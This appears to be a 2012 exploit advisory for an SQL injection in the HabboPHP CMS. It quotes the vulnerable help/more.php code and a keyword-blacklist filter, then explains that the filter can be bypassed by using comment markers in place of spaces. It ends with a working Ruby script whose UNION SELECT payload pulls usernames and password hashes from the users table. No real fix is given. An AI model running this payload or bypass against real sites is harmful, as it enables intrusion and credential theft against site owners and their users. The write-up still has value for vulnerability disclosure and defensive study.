HabboPHP <= 1.2.2 SQL injection

Download | Vote Up (1) | Vote Down (0) 
# Exploit Title: HabboPHP SQL injection
# Date: 29/08/2012
# Exploit Author: Kallimero
# Vendor Homepage: http://habbophp.com/downloads.php
# Version: All
# Tested on: Debian



Introduction
============

I don't really like habbo.
Moreover, every habbo cms I checked was full of crap (backdoor, huge security holes, etc).
But when a strange unknown claimed that HabboPHP had no vulnz, I had to release at least one.
There we go.

The vuln
========


First let's see the code :

---------------[help/more.php]---------------

if(isset($_GET['id']) && empty($_GET['id']) OR !is_numeric($_GET['id']))
        header('Location:/');
        
$query=mysql_query("SELECT * FROM habbophp_help_articles WHERE id=".safe($_GET['id'],'SQL')."");
$row=mysql_fetch_array($query);

---------------[help/more.php]---------------

An header is not enough to redirect the user (the php code after this instruction is executed too if there isn't a die or exit).
Therefore, we can inject in $_GET['id'], (the safe() function is useless here because we don't have to add quotes to inject SQL code).


The PoC :
=========

The developers implement a WAF :

---------------[includes/core.php]---------------

$injection = 'INSERT|UNION|SELECT|NULL|COUNT|FROM|LIKE|DROP|TABLE|WHERE|COUNT|COLUMN|TABLES|INFORMATION_SCHEMA|OR' ;
foreach($_GET as $getSearchs){
        $getSearch = explode(" ",$getSearchs);
        foreach($getSearch as $k=>$v){
                if(in_array(strtoupper(trim($v)),explode('|',$injection))){
                        exit;
                }
        }
}
---------------[includes/core.php]---------------

Well good try. At least, it's fun.
As you can see, they explode every get variable, ( $getSearch = explode(" ",$getSearchs); ), in order to search injection keywords.
What if you don't use space in our injection ? 
It'll pass the waf. w00t.

Here is a Ruby exploit :

-------------------------------------
#!/usr/bin/ruby

require 'net/http'

site = 'localhost'
path = '/pentest/habbophp/'
p = Net::HTTP.get(site, "#{path}help/more.php?id=-1/**/union/**/select/**/1,2,3,concat(0x7e,username,0x3a,password,0x7e)/**/FROM/**/users/**/LIMIT/**/1--+-")
puts p.scan(/~(.+?)~/)
------------------------------------

Have fun.



How to Fix ?
============

Stop habbo, grow up, and go meet some people outside.

 Thanks 
=========

All hwc members : Necromoine, fr0g, AppleSt0rm, St0rn, Zhyar, k3nz0, gr4ph0s.
Please visit : http://www.orgasm.re/

Groucho

Be the first to give feedback !
Please login to comment !